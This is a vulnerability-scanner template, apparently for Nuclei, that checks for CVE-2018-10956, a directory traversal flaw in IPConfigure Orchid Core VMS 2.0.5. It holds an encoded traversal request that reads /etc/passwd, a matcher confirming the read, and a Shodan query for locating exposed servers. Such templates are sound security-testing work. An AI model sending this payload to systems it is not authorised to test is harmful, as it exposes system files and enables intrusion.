47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2018-10956
|
|
|
|
info:
|
|
name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
|
|
remediation: |
|
|
Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
|
|
- https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
|
|
- https://www.exploit-db.com/exploits/44916/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10956
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-10956
|
|
cwe-id: CWE-22
|
|
epss-score: 0.65072
|
|
epss-percentile: 0.97559
|
|
cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: ipconfigure
|
|
product: orchid_core_vms
|
|
shodan-query: http.title:"Orchid Core VMS"
|
|
tags: cve,cve2018,orchid,vms,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100899f91952f199ed431f624f4700c229b838fe6effb2d482c20ee64dbd6281368022100b1420b87ca25960f825f71557f41f535441e89c8ce0aaadf7bbba39c1b7519ce:922c64590222798bb761d5b6d8e72950
|